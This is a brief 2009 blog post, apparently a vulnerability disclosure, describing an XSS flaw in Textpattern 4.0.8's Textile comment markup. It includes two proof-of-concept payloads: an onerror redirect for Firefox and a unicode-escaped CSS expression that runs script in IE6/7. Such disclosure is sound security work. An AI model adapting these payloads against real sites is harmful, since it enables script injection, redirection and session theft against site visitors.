jeffchannell.com

Textpattern 4.0.8 Textile XSS Vulnerability

Posted in PHP
2009-08-03 02:03:31 +0000 UTC
Textpattern 4.0.8, a PHP based CMS, has a unique approach to allowing user styled input: Textile. This BBCode-type markup allows users to easily style comments. It is also vulnerable to XSS.
A few caveats:

FF3 (limited, but redirection is possible):

!http://foo.com/fake.png"/onerror="location.href='http://google.com'!

Script execution in IE6/7 (poc - alerts 'XSS' ):

!http://foo.com/fake.png"/style="xss:\\0065\\0078\\0070\\0072\\0065\\0073\\0073\\0069\\006f\\006e\\0028\\0061\\006c\\0065\\0072\\0074\\0028\\0053\\0074\\0072\\0069\\006e\\0067\\002e\\0066\\0072\\006f\\006d\\0043\\0068\\0061\\0072\\0043\\006f\\0064\\0065\\0028\\0038\\0038\\002c\\0020\\0038\\0033\\002c\\0020\\0038\\0033\\0029\\0029\\0029!

Timeline